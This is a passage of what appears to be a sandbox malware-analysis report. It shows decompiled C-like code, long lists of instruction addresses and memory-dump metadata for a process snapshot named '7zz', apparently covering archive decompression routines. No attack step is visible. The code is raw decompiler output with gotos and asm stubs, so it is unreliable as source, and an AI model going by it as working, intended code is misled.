																	__eflags = _t214 - 8;
																	 *(_t333 + 4) =  *(_t333 + 4) << 8;
																	 *_t333 = _t214;
																} while (_t214 >= 8);
															}
															_t207 =  *(_t333 + 0x30);
															 *_t333 =  *_t333 + 8;
															 *(_t333 + 0x30) = _t207 >> 8;
															_t231 = _t231 + (_t207 & 0x000000ff);
															__eflags = _t231;
														}
														__eflags = 0 -  *((intOrPtr*)(_t356 + 0x20));
														_t193 =  *(_t356 + 0x1c);
														if(__eflags < 0) {
															L33:
															__eflags = _t231;
															if(_t231 > 0) {
																_t285 =  *(_t329 + 4);
																_t316 =  *(_t356 + 0x50);
																 *(_t356 + 0x48) = _t231;
																_t349 = _t285 - _t316 - 1;
																__eflags = _t316 - _t285;
																if(_t316 < _t285) {
																	L38:
																	__eflags =  *((intOrPtr*)(_t329 + 8)) - _t285 - _t231;
																	if( *((intOrPtr*)(_t329 + 8)) - _t285 <= _t231) {
																		L43:
																		__eflags = _t349 -  *((intOrPtr*)(_t329 + 0x10));
																		if(_t349 ==  *((intOrPtr*)(_t329 + 0x10))) {
																			_t349 = 0;
																			__eflags = 0;
																		}
																		 *((char*)( *_t329 +  *(_t329 + 4))) =  *((intOrPtr*)( *_t329 + _t349));
																		_t198 =  *(_t329 + 4) + 1;
																		_t349 = _t349 + 1;
																		__eflags = _t198 -  *((intOrPtr*)(_t329 + 8));
																		 *(_t329 + 4) = _t198;
																		if(__eflags == 0) {
																			L0040EFBD(_t329, __eflags);
																		}
																		_t200 =  *(_t356 + 0x48) - 1;
																		__eflags = _t200;
																		 *(_t356 + 0x48) = _t200;
																	} else {
																		__eflags =  *((intOrPtr*)(_t329 + 0x10)) - _t349 - _t231;
																		if( *((intOrPtr*)(_t329 + 0x10)) - _t349 <= _t231) {
																			do {
																				goto L43;
																			} while (_t200 != 0);
																		} else {
																			_t202 =  *_t329;
																			_t350 = _t349 + _t202;
																			_t203 = _t202 + _t285;
																			_t289 = _t285 + _t231;
																			__eflags = _t289;
																			 *(_t329 + 4) = _t289;
																			do {
																				 *_t203 =  *_t350;
																				_t203 = _t203 + 1;
																				_t350 = _t350 + 1;
																				_t292 =  *(_t356 + 0x48) - 1;
																				__eflags = _t292;
																				 *(_t356 + 0x48) = _t292;
																			} while (_t292 != 0);
																		}
																	}
																	_t193 =  *(_t356 + 0x1c);
																} else {
																	__eflags =  *(_t329 + 0x24);
																	if( *(_t329 + 0x24) != 0) {
																		_t321 =  *((intOrPtr*)(_t329 + 0x10));
																		__eflags =  *(_t356 + 0x50) - _t321;
																		if( *(_t356 + 0x50) < _t321) {
																			_t349 = _t349 + _t321;
																			__eflags = _t349;
																			goto L38;
																		}
																	}
																}
															}
														} else {
															if(__eflags > 0) {
																goto L27;
															} else {
																__eflags =  *(_t356 + 0x50) - _t193;
																if( *(_t356 + 0x50) < _t193) {
																	goto L33;
																} else {
																	while(1) {
																		L27:
																		__eflags = _t231;
																		if(_t231 <= 0) {
																			goto L49;
																		}
																		 *( *(_t329 + 4) +  *_t329) = 0;
																		_t324 =  *(_t329 + 4) + 1;
																		 *(_t329 + 4) = _t324;
																		__eflags = _t324 -  *((intOrPtr*)(_t329 + 8));
																		if(__eflags == 0) {
																			L0040EFBD(_t329, __eflags);
																		}
																		_t295 =  *((intOrPtr*)(_t356 + 0x20));
																		_t193 =  *(_t356 + 0x1c) + 1;
																		asm("adc ecx, 0x0");
																		_t231 = _t231 - 1;
																		__eflags = 0 - _t295;
																		 *(_t356 + 0x1c) = _t193;
																		 *((intOrPtr*)(_t356 + 0x20)) = _t295;
																		if(__eflags > 0) {
																			continue;
																		} else {
																			if(__eflags < 0) {
																				goto L33;
																			} else {
																				__eflags =  *(_t356 + 0x50) - _t193;
																				if( *(_t356 + 0x50) >= _t193) {
																					continue;
																				} else {
																					goto L33;
																				}
																			}
																		}
																		goto L49;
																	}
																}
															}
														}
														L49:
														_t337 =  *((intOrPtr*)(_t356 + 0x10));
														_t150 = _t193 + _t231;
														asm("adc ecx, 0x0");
														 *(_t356 + 0x1c) = _t150;
														goto L61;
													}
												}
											}
										} else {
											__eflags = _t150 & 0x0000ffff;
											if((_t150 & 0x0000ffff) != 0) {
												goto L15;
											} else {
												asm("cdq");
												asm("sbb edx, ebp");
												asm("adc edx, ebp");
												 *((intOrPtr*)(_t356 + 0x2c)) =  *((intOrPtr*)(_t333 + 8)) -  *((intOrPtr*)(_t333 + 0x10)) - (0x20 -  *_t333 >> 3) +  *(_t333 + 0x28) +  *((intOrPtr*)(_t333 + 0x18));
												asm("adc edx, ebp");
												 *((intOrPtr*)(_t356 + 0x34)) = _t309;
												_t232 =  *((intOrPtr*)( *_t221 + 0xc))(_t221, _t356 + 0x2c, _t356 + 0x1c);
												__eflags = _t232;
												if(_t232 != 0) {
													 *((intOrPtr*)(_t356 + 0x3c)) = 0xffffffff;
													E0044E120( *((intOrPtr*)(_t356 + 0x10)));
													_t153 = _t232;
												} else {
													_t337 =  *((intOrPtr*)(_t356 + 0x10));
													goto L15;
												}
											}
										}
									} else {
										__eflags = _t150 -  *((intOrPtr*)(_t356 + 0x24));
										if(_t150 <  *((intOrPtr*)(_t356 + 0x24))) {
											goto L11;
											do {
												do {
													goto L11;
													L61:
													_t309 =  *((intOrPtr*)(_t356 + 0x28));
													__eflags =  *((intOrPtr*)(_t356 + 0x20)) - _t309;
												} while (__eflags < 0);
												if(__eflags > 0) {
													goto L64;
												} else {
													goto L63;
												}
												goto L71;
												L63:
												__eflags = _t150 -  *((intOrPtr*)(_t356 + 0x24));
											} while (_t150 <  *((intOrPtr*)(_t356 + 0x24)));
										}
										goto L64;
									}
								}
							} else {
								 *((intOrPtr*)(_t356 + 0x3c)) = 0xffffffff;
								E0044E120(_t337);
								_t153 = 1;
							}
						} else {
							_t153 = 0x80070057;
						}
					} else {
						_t153 = 0x8007000e;
					}
				} else {
					_t153 = 0x8007000e;
				}
				L71:
				 *[fs:0x0] =  *((intOrPtr*)(_t356 + 0x34));
				return _t153;
			}






















































                                                                                                                                    0x0044e430
                                                                                                                                    0x0044e432
                                                                                                                                    0x0044e43d
                                                                                                                                    0x0044e43e
                                                                                                                                    0x0044e445
                                                                                                                                    0x0044e44a
                                                                                                                                    0x0044e453
                                                                                                                                    0x0044e456
                                                                                                                                    0x0044e463
                                                                                                                                    0x0044e46f
                                                                                                                                    0x0044e474
                                                                                                                                    0x0044e47a
                                                                                                                                    0x0044e47f
                                                                                                                                    0x0044e481
                                                                                                                                    0x0044e48d
                                                                                                                                    0x0044e493
                                                                                                                                    0x0044e495
                                                                                                                                    0x0044e4aa
                                                                                                                                    0x0044e4b1
                                                                                                                                    0x0044e4b5
                                                                                                                                    0x0044e4b9
                                                                                                                                    0x0044e4bd
                                                                                                                                    0x0044e4c5
                                                                                                                                    0x0044e4d1
                                                                                                                                    0x0044e4d6
                                                                                                                                    0x0044e4dc
                                                                                                                                    0x0044e4e1
                                                                                                                                    0x0044e4e7
                                                                                                                                    0x0044e4ea
                                                                                                                                    0x0044e4ed
                                                                                                                                    0x0044e4f0
                                                                                                                                    0x0044e4f6
                                                                                                                                    0x0044e4fa
                                                                                                                                    0x0044e4ff
                                                                                                                                    0x0044e501
                                                                                                                                    0x0044e51c
                                                                                                                                    0x0044e524
                                                                                                                                    0x0044e526
                                                                                                                                    0x0044e52a
                                                                                                                                    0x0044e8ae
                                                                                                                                    0x0044e8b6
                                                                                                                                    0x0044e8b8
                                                                                                                                    0x0044e903
                                                                                                                                    0x0044e905
                                                                                                                                    0x0044e90e
                                                                                                                                    0x0044e916
                                                                                                                                    0x0044e91b
                                                                                                                                    0x0044e8ba
                                                                                                                                    0x0044e8ba
                                                                                                                                    0x00000000
                                                                                                                                    0x0044e8bc
                                                                                                                                    0x0044e8bc
                                                                                                                                    0x0044e8c0
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0044e8c0
                                                                                                                                    0x0044e8ba
                                                                                                                                    0x0044e530
                                                                                                                                    0x0044e530
                                                                                                                                    0x0044e53c
                                                                                                                                    0x0044e53c
                                                                                                                                    0x0044e540
                                                                                                                                    0x0044e542
                                                                                                                                    0x0044e5a1
                                                                                                                                    0x0044e5a3
                                                                                                                                    0x0044e5a8
                                                                                                                                    0x0044e5b5
                                                                                                                                    0x0044e5b7
                                                                                                                                    0x0044e5b9
                                                                                                                                    0x0044e5bc
                                                                                                                                    0x0044e7c7
                                                                                                                                    0x0044e7c9
                                                                                                                                    0x0044e7e3
                                                                                                                                    0x0044e7e6
                                                                                                                                    0x0044e7e8
                                                                                                                                    0x0044e7f0
                                                                                                                                    0x0044e7f5
                                                                                                                                    0x0044e7fa
                                                                                                                                    0x0044e7fc
                                                                                                                                    0x0044e801
                                                                                                                                    0x0044e806
                                                                                                                                    0x0044e806
                                                                                                                                    0x0044e807
                                                                                                                                    0x0044e807
                                                                                                                                    0x0044e80e
                                                                                                                                    0x0044e825
                                                                                                                                    0x0044e838
                                                                                                                                    0x0044e83b
                                                                                                                                    0x0044e83e
                                                                                                                                    0x0044e841
                                                                                                                                    0x0044e841
                                                                                                                                    0x0044e7e8
                                                                                                                                    0x0044e845
                                                                                                                                    0x0044e84f
                                                                                                                                    0x0044e855
                                                                                                                                    0x0044e857
                                                                                                                                    0x0044e857
                                                                                                                                    0x0044e85a
                                                                                                                                    0x00000000
                                                                                                                                    0x0044e7cb
                                                                                                                                    0x0044e7cb
                                                                                                                                    0x0044e7cf
                                                                                                                                    0x0044e7d4
                                                                                                                                    0x0044e7d9
                                                                                                                                    0x0044e8c2
                                                                                                                                    0x0044e8c4
                                                                                                                                    0x0044e8cc
                                                                                                                                    0x0044e8d1
                                                                                                                                    0x0044e7df
                                                                                                                                    0x0044e7df
                                                                                                                                    0x0044e85d
                                                                                                                                    0x0044e862
                                                                                                                                    0x0044e86b
                                                                                                                                    0x0044e86e
                                                                                                                                    0x0044e871
                                                                                                                                    0x0044e873
                                                                                                                                    0x0044e877
                                                                                                                                    0x0044e877
                                                                                                                                    0x0044e884
                                                                                                                                    0x0044e884
                                                                                                                                    0x0044e887
                                                                                                                                    0x0044e88a
                                                                                                                                    0x00000000
                                                                                                                                    0x0044e88e
                                                                                                                                    0x0044e7d9
                                                                                                                                    0x0044e5c2
                                                                                                                                    0x0044e5c2
                                                                                                                                    0x0044e5ca
                                                                                                                                    0x0044e5cf
                                                                                                                                    0x0044e5d9
                                                                                                                                    0x0044e5e0
                                                                                                                                    0x0044e5e4
                                                                                                                                    0x0044e5e9
                                                                                                                                    0x0044e5ed
                                                                                                                                    0x0044e5f3
                                                                                                                                    0x0044e5f6
                                                                                                                                    0x0044e5fb
                                                                                                                                    0x0044e5fe
                                                                                                                                    0x0044e8ed
                                                                                                                                    0x0044e8ef
                                                                                                                                    0x0044e8f7
                                                                                                                                    0x0044e8fc
                                                                                                                                    0x0044e604
                                                                                                                                    0x0044e60a
                                                                                                                                    0x0044e60d
                                                                                                                                    0x0044e615
                                                                                                                                    0x0044e619
                                                                                                                                    0x0044e61e
                                                                                                                                    0x0044e621
                                                                                                                                    0x00000000
                                                                                                                                    0x0044e627
                                                                                                                                    0x0044e62d
                                                                                                                                    0x0044e62f
                                                                                                                                    0x0044e632
                                                                                                                                    0x0044e634
                                                                                                                                    0x0044e637
                                                                                                                                    0x0044e639
                                                                                                                                    0x0044e641
                                                                                                                                    0x0044e646
                                                                                                                                    0x0044e64b
                                                                                                                                    0x0044e64d
                                                                                                                                    0x0044e652
                                                                                                                                    0x0044e657
                                                                                                                                    0x0044e657
                                                                                                                                    0x0044e658
                                                                                                                                    0x0044e658
                                                                                                                                    0x0044e65f
                                                                                                                                    0x0044e676
                                                                                                                                    0x0044e689
                                                                                                                                    0x0044e68c
                                                                                                                                    0x0044e68f
                                                                                                                                    0x0044e692
                                                                                                                                    0x0044e692
                                                                                                                                    0x0044e639
                                                                                                                                    0x0044e696
                                                                                                                                    0x0044e6a6
                                                                                                                                    0x0044e6ab
                                                                                                                                    0x0044e6ae
                                                                                                                                    0x0044e6ae
                                                                                                                                    0x0044e6ae
                                                                                                                                    0x0044e6b6
                                                                                                                                    0x0044e6b8
                                                                                                                                    0x0044e6bc
                                                                                                                                    0x0044e711
                                                                                                                                    0x0044e711
                                                                                                                                    0x0044e713
                                                                                                                                    0x0044e719
                                                                                                                                    0x0044e71c
                                                                                                                                    0x0044e722
                                                                                                                                    0x0044e728
                                                                                                                                    0x0044e729
                                                                                                                                    0x0044e72b
                                                                                                                                    0x0044e73f
                                                                                                                                    0x0044e744
                                                                                                                                    0x0044e746
                                                                                                                                    0x0044e770
                                                                                                                                    0x0044e770
                                                                                                                                    0x0044e773
                                                                                                                                    0x0044e775
                                                                                                                                    0x0044e775
                                                                                                                                    0x0044e775
                                                                                                                                    0x0044e77f
                                                                                                                                    0x0044e788
                                                                                                                                    0x0044e789
                                                                                                                                    0x0044e78a
                                                                                                                                    0x0044e78c
                                                                                                                                    0x0044e78f
                                                                                                                                    0x0044e793
                                                                                                                                    0x0044e793
                                                                                                                                    0x0044e79c
                                                                                                                                    0x0044e79c
                                                                                                                                    0x0044e79d
                                                                                                                                    0x0044e748
                                                                                                                                    0x0044e74d
                                                                                                                                    0x0044e74f
                                                                                                                                    0x0044e770
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0044e751
                                                                                                                                    0x0044e751
                                                                                                                                    0x0044e753
                                                                                                                                    0x0044e755
                                                                                                                                    0x0044e757
                                                                                                                                    0x0044e757
                                                                                                                                    0x0044e759
                                                                                                                                    0x0044e75c
                                                                                                                                    0x0044e75f
                                                                                                                                    0x0044e765
                                                                                                                                    0x0044e766
                                                                                                                                    0x0044e767
                                                                                                                                    0x0044e767
                                                                                                                                    0x0044e768
                                                                                                                                    0x0044e768
                                                                                                                                    0x0044e76e
                                                                                                                                    0x0044e74f
                                                                                                                                    0x0044e7a3
                                                                                                                                    0x0044e72d
                                                                                                                                    0x0044e730
                                                                                                                                    0x0044e732
                                                                                                                                    0x0044e734
                                                                                                                                    0x0044e737
                                                                                                                                    0x0044e73b
                                                                                                                                    0x0044e73d
                                                                                                                                    0x0044e73d
                                                                                                                                    0x00000000
                                                                                                                                    0x0044e73d
                                                                                                                                    0x0044e73b
                                                                                                                                    0x0044e732
                                                                                                                                    0x0044e72b
                                                                                                                                    0x0044e6be
                                                                                                                                    0x0044e6be
                                                                                                                                    0x00000000
                                                                                                                                    0x0044e6c0
                                                                                                                                    0x0044e6c0
                                                                                                                                    0x0044e6c4
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0044e6c6
                                                                                                                                    0x0044e6c6
                                                                                                                                    0x0044e6c6
                                                                                                                                    0x0044e6c8
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0044e6d3
                                                                                                                                    0x0044e6dd
                                                                                                                                    0x0044e6e0
                                                                                                                                    0x0044e6e3
                                                                                                                                    0x0044e6e5
                                                                                                                                    0x0044e6e9
                                                                                                                                    0x0044e6e9
                                                                                                                                    0x0044e6f2
                                                                                                                                    0x0044e6f6
                                                                                                                                    0x0044e6f9
                                                                                                                                    0x0044e6fc
                                                                                                                                    0x0044e6fd
                                                                                                                                    0x0044e6ff
                                                                                                                                    0x0044e703
                                                                                                                                    0x0044e707
                                                                                                                                    0x00000000
                                                                                                                                    0x0044e709
                                                                                                                                    0x0044e709
                                                                                                                                    0x00000000
                                                                                                                                    0x0044e70b
                                                                                                                                    0x0044e70b
                                                                                                                                    0x0044e70f
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0044e70f
                                                                                                                                    0x0044e709
                                                                                                                                    0x00000000
                                                                                                                                    0x0044e707
                                                                                                                                    0x0044e6c6
                                                                                                                                    0x0044e6c4
                                                                                                                                    0x0044e6be
                                                                                                                                    0x0044e7a7
                                                                                                                                    0x0044e7ab
                                                                                                                                    0x0044e7af
                                                                                                                                    0x0044e7b1
                                                                                                                                    0x0044e7b4
                                                                                                                                    0x00000000
                                                                                                                                    0x0044e7b8
                                                                                                                                    0x0044e621
                                                                                                                                    0x0044e5fe
                                                                                                                                    0x0044e544
                                                                                                                                    0x0044e54b
                                                                                                                                    0x0044e54d
                                                                                                                                    0x00000000
                                                                                                                                    0x0044e54f
                                                                                                                                    0x0044e562
                                                                                                                                    0x0044e56b
                                                                                                                                    0x0044e572
                                                                                                                                    0x0044e57d
                                                                                                                                    0x0044e585
                                                                                                                                    0x0044e588
                                                                                                                                    0x0044e593
                                                                                                                                    0x0044e595
                                                                                                                                    0x0044e597
                                                                                                                                    0x0044e8dc
                                                                                                                                    0x0044e8e4
                                                                                                                                    0x0044e8e9
                                                                                                                                    0x0044e59d
                                                                                                                                    0x0044e59d
                                                                                                                                    0x00000000
                                                                                                                                    0x0044e59d
                                                                                                                                    0x0044e597
                                                                                                                                    0x0044e54d
                                                                                                                                    0x0044e532
                                                                                                                                    0x0044e532
                                                                                                                                    0x0044e536
                                                                                                                                    0x00000000
                                                                                                                                    0x0044e53c
                                                                                                                                    0x0044e53c
                                                                                                                                    0x00000000
                                                                                                                                    0x0044e892
                                                                                                                                    0x0044e896
                                                                                                                                    0x0044e89a
                                                                                                                                    0x0044e89a
                                                                                                                                    0x0044e8a2
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0044e8a4
                                                                                                                                    0x0044e8a4
                                                                                                                                    0x0044e8a4
                                                                                                                                    0x0044e53c
                                                                                                                                    0x00000000
                                                                                                                                    0x0044e536
                                                                                                                                    0x0044e530
                                                                                                                                    0x0044e503
                                                                                                                                    0x0044e505
                                                                                                                                    0x0044e50d
                                                                                                                                    0x0044e512
                                                                                                                                    0x0044e512
                                                                                                                                    0x0044e497
                                                                                                                                    0x0044e497
                                                                                                                                    0x0044e497
                                                                                                                                    0x0044e483
                                                                                                                                    0x0044e483
                                                                                                                                    0x0044e483
                                                                                                                                    0x0044e465
                                                                                                                                    0x0044e465
                                                                                                                                    0x0044e465
                                                                                                                                    0x0044e91d
                                                                                                                                    0x0044e925
                                                                                                                                    0x0044e92f

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: bdb79ba1893ab33bcd4eb932cbc06b661e8d4d2b215cf5133c1798053672a223
                                                                                                                                    • Instruction ID: 149f3ba7fcc7b310817431056b7830669582af05e2817226ce6dbfe3fe10b790
                                                                                                                                    • Opcode Fuzzy Hash: bdb79ba1893ab33bcd4eb932cbc06b661e8d4d2b215cf5133c1798053672a223
                                                                                                                                    • Instruction Fuzzy Hash: 33F1B3706047428FEB14DF2AC59062AF7E1FF89314F544A2EE4E687781D738E945CB49
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00451050 Relevance: .4, Instructions: 373COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 69%
                                                                                                                                    			E00451050(void* __ecx) {
				intOrPtr _t134;
				intOrPtr _t137;
				signed int _t139;
				signed int _t140;
				signed int _t141;
				void* _t143;
				void* _t145;
				void* _t147;
				void* _t149;
				signed int _t163;
				intOrPtr* _t182;
				unsigned int _t185;
				intOrPtr* _t189;
				intOrPtr* _t191;
				intOrPtr _t201;
				signed int _t213;
				int _t223;
				void* _t241;
				unsigned int _t244;
				intOrPtr _t246;
				signed int _t247;
				unsigned int _t250;
				unsigned int _t251;
				signed int _t252;
				signed char _t263;
				intOrPtr _t273;
				intOrPtr* _t276;
				intOrPtr* _t281;
				int _t282;
				intOrPtr _t283;
				signed int _t294;
				void* _t301;
				unsigned int _t306;
				void* _t307;
				signed char _t310;
				intOrPtr* _t312;
				void* _t313;
				void* _t316;
				signed int _t318;
				void* _t319;
				intOrPtr* _t320;
				void* _t321;

				_t319 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x1cc0)) != 0) {
					_t201 =  *((intOrPtr*)(__ecx + 8));
					_t276 = __ecx + 8;
					if(_t201 <  *((intOrPtr*)(__ecx + 0xc))) {
						 *_t276 = _t201 + 1;
					} else {
						E0040E070(_t276);
					}
				}
				_t312 = _t319 + 8;
				if( *(_t319 + 0x2c) >= 0x10) {
					do {
						_t189 =  *_t312;
						if(_t189 <  *((intOrPtr*)(_t312 + 4))) {
							 *(_t321 + 0x10) =  *_t189;
							 *_t312 = _t189 + 1;
						} else {
							 *(_t321 + 0x10) = E0040E070(_t312);
						}
						_t191 =  *_t312;
						if(_t191 <  *((intOrPtr*)(_t312 + 4))) {
							 *(_t321 + 0x14) =  *_t191;
							 *_t312 = _t191 + 1;
						} else {
							 *(_t321 + 0x14) = E0040E070(_t312);
						}
						_t273 =  *((intOrPtr*)(_t312 + 0x24)) + 0xfffffff0;
						 *((intOrPtr*)(_t312 + 0x24)) = _t273;
						 *(_t312 + 0x20) = ( *(_t312 + 0x20) << 0x00000008 |  *(_t321 + 0x14) & 0x000000ff) << 0x00000008 |  *(_t321 + 0x10) & 0x000000ff;
					} while (_t273 >= 0x10);
				}
				_t294 = E00450B20(3);
				 *(_t321 + 0x10) = _t294;
				if(_t294 <= 3) {
					if( *((intOrPtr*)(_t319 + 0x1cc1)) == 0) {
						_t134 =  *((intOrPtr*)(_t312 + 0x24));
						 *((intOrPtr*)(_t312 + 0x24)) = _t134 + 0xc;
						E00450FC0(_t312);
						_t137 =  *((intOrPtr*)(_t312 + 0x24));
						 *((intOrPtr*)(_t312 + 0x24)) = _t137 + 0xc;
						_t139 = E00450FC0(_t312);
						 *(_t319 + 0x1cb4) = (( *(_t312 + 0x20) >> 0x0000000f - _t134 >> 0x00000005 & 0x00000fff) << 0xc) + ( *(_t312 + 0x20) >> 0x0000000f - _t137 >> 0x00000005 & 0x00000fff);
						_t294 =  *(_t321 + 0x10);
					} else {
						_t139 = E00450B20(1);
						if(_t139 != 1) {
							_t139 = E00450B20(0x10);
							 *(_t319 + 0x1cb4) = _t139;
						} else {
							 *(_t319 + 0x1cb4) = 0x8000;
						}
					}
					_t140 = _t139 & 0xffffff00 | _t294 == 0x00000003;
					 *(_t319 + 0x68) = _t140;
					if(_t140 == 0 || ( *(_t319 + 0x1cb4) & 0x00000001) == 0) {
						_t223 = 0;
					} else {
						_t223 = 1;
					}
					 *(_t319 + 0x1cc0) = _t223;
					if(_t140 == 0) {
						_t141 = _t140 & 0xffffff00 | _t294 == 0x00000002;
						 *(_t319 + 0x69) = _t141;
						if(_t141 == 0) {
							L52:
							_push(0x100);
							_push(_t321 + 0xa4);
							_push(_t319 + 0x1920);
							_t143 = E00450BD0(_t319);
							if(_t143 != 0) {
								_push( *((intOrPtr*)(_t319 + 0x64)));
								_push(_t321 + 0x1a4);
								_push(_t319 + 0x1a20);
								_t145 = E00450BD0(_t319);
								if(_t145 != 0) {
									_t147 =  *((intOrPtr*)(_t319 + 0x64)) + 0x100;
									if(_t147 < 0x290) {
										_t301 = _t321 + _t147 + 0xa4;
										memset(_t301 + (0x290 - _t147 >> 2), memset(_t301, 0, 0x290 << 2), 0 << 0);
										_t321 = _t321 + 0x18;
									}
									_push(_t321 + 0xa4);
									_t149 = E00451F90(_t319 + 0x6c);
									if(_t149 != 0) {
										_push(0xf9);
										_push(_t321 + 0xa4);
										_push(_t319 + 0x1bb0);
										if(E00450BD0(_t319) != 0) {
											_push(_t321 + 0xa4);
											return E004520E0(_t319 + 0xd34);
										} else {
											goto L61;
										}
									} else {
										return _t149;
									}
								} else {
									return _t145;
								}
							} else {
								return _t143;
							}
						} else {
							_t313 = 0;
							do {
								 *((char*)(_t321 + _t313 + 0xa4)) = E00450B20(3);
								_t313 = _t313 + 1;
							} while (_t313 < 8);
							_t281 = _t319 + 0x1428;
							memset(_t321 + 0x20, 0, 0x10 << 2);
							_t321 = _t321 + 0xc;
							_t306 = 0;
							_t241 = 0;
							while(0 <= 0x10) {
								 *_t281 = 0xffffffff;
								_t241 = _t241 + 1;
								_t281 = _t281 + 4;
								 *((intOrPtr*)(_t321 + 0x1c)) =  *((intOrPtr*)(_t321 + 0x1c)) + 1;
								if(_t241 < 8) {
									continue;
								} else {
									_t163 = 0;
									 *(_t321 + 0x1c) = _t306;
									 *(_t319 + 0x13a0) = _t306;
									 *(_t319 + 0x13e4) = _t306;
									 *(_t321 + 0x10) = 0;
									_t282 = 1;
									while(1) {
										_t316 = _t321 + 0x1c + _t282 * 4;
										_t306 = _t306 + ( *(_t321 + 0x1c + _t282 * 4) << 0x10 - _t282);
										 *(_t321 + 0x18) = _t306;
										if(_t306 > 0x10000) {
											goto L61;
										}
										_t244 = 0x10000;
										if(_t282 != 0x10) {
											_t244 = _t306;
										}
										 *(_t319 + 0x13a0 + _t282 * 4) = _t244;
										_t246 =  *((intOrPtr*)(_t319 + 0x13e0 + _t282 * 4)) +  *((intOrPtr*)(_t316 - 4));
										 *((intOrPtr*)(_t319 + 0x13e4 + _t282 * 4)) = _t246;
										 *((intOrPtr*)(_t321 + 0x60 + _t282 * 4)) = _t246;
										if(_t282 <= 9) {
											_t250 =  *(_t319 + 0x13a0 + _t282 * 4) >> 7;
											if(_t163 < _t250) {
												_t96 = _t319 + 0x1448; // 0x1448
												_t307 = _t163 + _t96;
												_t251 = _t250 - _t163;
												 *(_t321 + 0x14) = _t251;
												_t318 = _t251;
												_t252 = _t251 >> 2;
												memset(_t307 + _t252, memset(_t307, _t282, _t252 << 2), (_t318 & 0x00000003) << 0);
												_t321 = _t321 + 0x18;
												_t306 =  *(_t321 + 0x18);
												_t163 =  *(_t321 + 0x10) + _t318;
												 *(_t321 + 0x10) = _t163;
											}
										}
										_t282 = _t282 + 1;
										if(_t282 <= 0x10) {
											continue;
										} else {
											_t283 = 0;
											do {
												if(0 != 0) {
													_t247 =  *(_t321 + 0x60);
													 *((intOrPtr*)(_t319 + 0x1428 + _t247 * 4)) = _t283;
													 *(_t321 + 0x60) = _t247 + 1;
												}
												_t283 = _t283 + 1;
											} while (_t283 < 8);
											goto L52;
										}
										goto L63;
									}
									goto L61;
								}
								goto L63;
							}
							goto L61;
						}
					} else {
						E00450B20(0x10 - ( *(_t319 + 0x2c) & 0x0000000f));
						if( *((intOrPtr*)(_t312 + 0x24)) != 0) {
							L61:
							return 0;
						} else {
							 *(_t321 + 0x14) = 2;
							 *(_t319 + 0x58) =  *(_t312 + 0x20) >> 0x00000010 |  *(_t312 + 0x20) << 0x00000010;
							 *((intOrPtr*)(_t312 + 0x24)) = 0x20;
							 *(_t319 + 0x58) =  *(_t319 + 0x58) - 1;
							_t320 = _t319 + 0x5c;
							do {
								_t213 = 0;
								_t310 = 0;
								do {
									_t182 =  *_t312;
									if(_t182 <  *((intOrPtr*)(_t312 + 4))) {
										 *(_t321 + 0x10) =  *_t182;
										 *_t312 = _t182 + 1;
									} else {
										 *(_t321 + 0x10) = E0040E070(_t312);
									}
									_t263 = _t310;
									_t310 = _t310 + 8;
									_t213 = _t213 | ( *(_t321 + 0x10) & 0x000000ff) << _t263;
								} while (_t310 < 0x20);
								 *_t320 = _t213 - 1;
								_t320 = _t320 + 4;
								_t185 =  *(_t321 + 0x14) - 1;
								 *(_t321 + 0x14) = _t185;
							} while (_t185 != 0);
							return 1;
						}
					}
				} else {
					return 0;
				}
				L63:
			}













































                                                                                                                                    0x00451058
                                                                                                                                    0x00451064
                                                                                                                                    0x00451066
                                                                                                                                    0x0045106c
                                                                                                                                    0x00451071
                                                                                                                                    0x0045107b
                                                                                                                                    0x00451073
                                                                                                                                    0x00451073
                                                                                                                                    0x00451073
                                                                                                                                    0x00451071
                                                                                                                                    0x00451080
                                                                                                                                    0x0045108a
                                                                                                                                    0x00451091
                                                                                                                                    0x00451091
                                                                                                                                    0x00451098
                                                                                                                                    0x004510aa
                                                                                                                                    0x004510ae
                                                                                                                                    0x0045109a
                                                                                                                                    0x004510a1
                                                                                                                                    0x004510a1
                                                                                                                                    0x004510b0
                                                                                                                                    0x004510b7
                                                                                                                                    0x004510c9
                                                                                                                                    0x004510cd
                                                                                                                                    0x004510b9
                                                                                                                                    0x004510c0
                                                                                                                                    0x004510c0
                                                                                                                                    0x004510f1
                                                                                                                                    0x004510f5
                                                                                                                                    0x004510f8
                                                                                                                                    0x004510fd
                                                                                                                                    0x00451091
